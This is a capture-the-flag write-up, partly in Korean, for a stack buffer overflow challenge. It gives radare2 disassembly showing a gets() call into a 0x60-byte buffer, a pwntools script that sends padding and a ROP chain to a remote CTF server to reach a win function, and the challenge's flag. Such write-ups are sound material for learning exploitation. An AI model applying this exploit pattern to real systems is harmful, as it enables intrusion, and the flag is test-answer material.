; CALL XREF from main @ 0x4008b8(x)
┌ 97: fcn.00400797 ();
│ 0x00400797 55 push rbp
│ 0x00400798 4889e5 mov rbp, rsp
│ 0x0040079b 488b05ee08.. mov rax, qword [obj.stdin] ; [0x601090:8]=0
│ 0x004007a2 b900000000 mov ecx, 0
│ 0x004007a7 ba02000000 mov edx, 2
│ 0x004007ac be00000000 mov esi, 0
│ 0x004007b1 4889c7 mov rdi, rax
│ 0x004007b4 e8c7feffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x004007b9 488b05c008.. mov rax, qword [obj.stdout] ; [0x601080:8]=0
│ 0x004007c0 b900000000 mov ecx, 0
│ 0x004007c5 ba02000000 mov edx, 2
│ 0x004007ca be00000000 mov esi, 0
│ 0x004007cf 4889c7 mov rdi, rax
│ 0x004007d2 e8a9feffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x004007d7 488b05c208.. mov rax, qword [obj.stderr] ; [0x6010a0:8]=0
│ 0x004007de b900000000 mov ecx, 0
│ 0x004007e3 ba02000000 mov edx, 2
│ 0x004007e8 be00000000 mov esi, 0
│ 0x004007ed 4889c7 mov rdi, rax
│ 0x004007f0 e88bfeffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x004007f5 90 nop
│ 0x004007f6 5d pop rbp
└ 0x004007f7 c3 ret
[0x00400797]> s main
[0x004008ab]> pdf
; DATA XREF from entry0 @ 0x4006cd(r)
┌ 78: int main (int argc, char **argv, char **envp);
│ ; var int64_t var_60h @ rbp-0x60
│ 0x004008ab 55 push rbp
│ 0x004008ac 4889e5 mov rbp, rsp
│ 0x004008af 4883ec60 sub rsp, 0x60
│ 0x004008b3 b800000000 mov eax, 0
│ 0x004008b8 e8dafeffff call fcn.00400797
│ 0x004008bd 488d3de600.. lea rdi, str.Whats_your_name_ ; 0x4009aa ; "What's your name?"
│ 0x004008c4 e867fdffff call sym.imp.puts ; int puts(const char *s)
│ 0x004008c9 488d45a0 lea rax, [var_60h]
│ 0x004008cd 4889c7 mov rdi, rax
│ 0x004008d0 b800000000 mov eax, 0
│ 0x004008d5 e896fdffff call sym.imp.gets ; char *gets(char *s)
│ 0x004008da 488d45a0 lea rax, [var_60h]
│ 0x004008de 4889c6 mov rsi, rax
│ 0x004008e1 488d3dd400.. lea rdi, str.Hi___s__n ; 0x4009bc ; "Hi, %s!\\n"
│ 0x004008e8 b800000000 mov eax, 0
│ 0x004008ed e84efdffff call sym.imp.printf ; int printf(const char *format)
│ 0x004008f2 b800000000 mov eax, 0
│ 0x004008f7 c9 leave
└ 0x004008f8 c3 ret
[0x004008ab]> ss fcn.004006f0
[0x004006f0]> pdf
; CALL XREF from entry.fini0 @ 0x40076d(x)
┌ 37: fcn.004006f0 ();
│ 0x004006f0 55 push rbp
│ 0x004006f1 b868106000 mov eax, 0x601068 ; 'h\\x10`'
│ 0x004006f6 483d68106000 cmp rax, 0x601068 ; 'h\\x10`'
│ 0x004006fc 4889e5 mov rbp, rsp
│ ┌─< 0x004006ff 7417 je 0x400718
│ │ 0x00400701 b800000000 mov eax, 0
│ │ 0x00400706 4885c0 test rax, rax
│ ┌──< 0x00400709 740d je 0x400718
│ ││ 0x0040070b 5d pop rbp
│ ││ 0x0040070c bf68106000 mov edi, 0x601068 ; 'h\\x10`'
│ ││ 0x00400711 ffe0 jmp rax
..
│ └└─> 0x00400718 5d pop rbp
└ 0x00400719 c3 ret
[0x004006f0]>
간단한 BOF문제다. 특정 값 OverWrite으로 If문을 넘어가면 된다.
from pwn import *
#p = remote
#p = process('./arg')
p = remote('server.sqli.kr',30000)
e = ELF('./arg')
context.arch = 'amd64'
context.log_level = 'debug'
libc = e.libc
def slog(name,addr): return success(": ".join([name,hex(addr)]))
#gdb.attach(p,'b*0x004008f8')
pop_rdi = 0x0000000000400963 # pop rdi;
pop_rsi_r15_ret = 0x0000000000400961 #pop rsi; pop r15; ret;
read_plt = e.plt['read']
read_got = e.got['read']
printf_plt = e.plt['printf']
printf_got = e.got['printf']
pay = b'A'*104
#pay += p64(0x000000000040061e) #ret
pay += p64(0x0000000000400963) + p64(0x232300)
pay += p64(0x0000000000400961) + p64(0xDEEDBEAF) + p64(0)
pay += p64(0x4007F8) #win_addr
# pay += p64(pop_rdi)
# pay += p64(printf_got)
#pay += p64(printf_plt)
# pay += p64(0x004008ab)
p.sendafter(b"name?", pay)
p.interactive()
flag : Sunrin{ad85191532e811257634004e00fb9c907ac0985fac455358d2cae1ebabdd4ce2}